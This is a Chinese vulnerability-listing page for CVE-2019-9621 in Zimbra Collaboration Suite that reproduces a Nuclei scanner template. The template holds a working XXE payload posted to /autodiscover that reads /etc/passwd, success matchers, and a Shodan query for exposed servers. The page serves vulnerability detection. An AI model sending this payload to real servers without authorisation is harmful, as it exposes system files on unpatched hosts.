CVE-2019-9621: Zimbra Collaboration Suite - SSRF

日期: 2025-08-01 | 影响软件: Zimbra Collaboration Suite | POC: 已公开

漏洞描述

Zimbra Collaboration Suite before 8.6 patch 13, 8.7.x before 8.7.11 patch 10, and 8.8.x before 8.8.10 patch 7 or 8.8.x before 8.8.11 patch 3 allows SSRF via the ProxyServlet component.

PoC代码[已公开]

id: CVE-2019-9621

info:
  name: Zimbra Collaboration Suite - SSRF
  author: riteshs4hu
  severity: high
  description: |
    Zimbra Collaboration Suite before 8.6 patch 13, 8.7.x before 8.7.11 patch 10, and 8.8.x before 8.8.10 patch 7 or 8.8.x before 8.8.11 patch 3 allows SSRF via the ProxyServlet component.
  reference:
    - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/zimbra_xxe_rce.rb
    - https://nvd.nist.gov/vuln/detail/cve-2019-9621
    - http://packetstormsecurity.com/files/153190/Zimbra-XML-Injection-Server-Side-Request-Forgery.html
    - https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html
    - https://bugzilla.zimbra.com/show_bug.cgi?id=109127
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-9621
    cwe-id: CWE-918
    epss-score: 0.91807
    epss-percentile: 0.99663
    cpe: cpe:2.3:a:zimbra:collaboration_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: zimbra
    product: collaboration_server
    shodan-query: html:"Zimbra Collaboration Suite Web Client"
  tags: cve,cve2019,zimbra,collaboration-server,oast,oob,xxe,kev,vkev

http:
  - raw:
      - |
        POST /autodiscover HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version="1.0"?>
        <!DOCTYPE soap [
        <!ELEMENT soap ANY >
        <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
        <Autodiscover>
          <Request>
            <EMailAddress>test@example.com</EMailAddress>
            <AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
          </Request>
        </Autodiscover>

    matchers:
      - type: dsl
        dsl:
          - regex('root:.*:0:0:', body)
          - contains(body, "response schema")
          - contains(header, "text/html")
        condition: and
# digest: 4a0a00473045022100f8549b07f7b063f6ef7fa33f2d2339756f8ddb7fa79da40d567f5268bbadb698022028a3ac5d10d12235838c558b3147bb2b18992f3bc35ede0f4820eb1b99530978:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/./http/cves/2019/CVE-2019-9621.yaml

相关漏洞推荐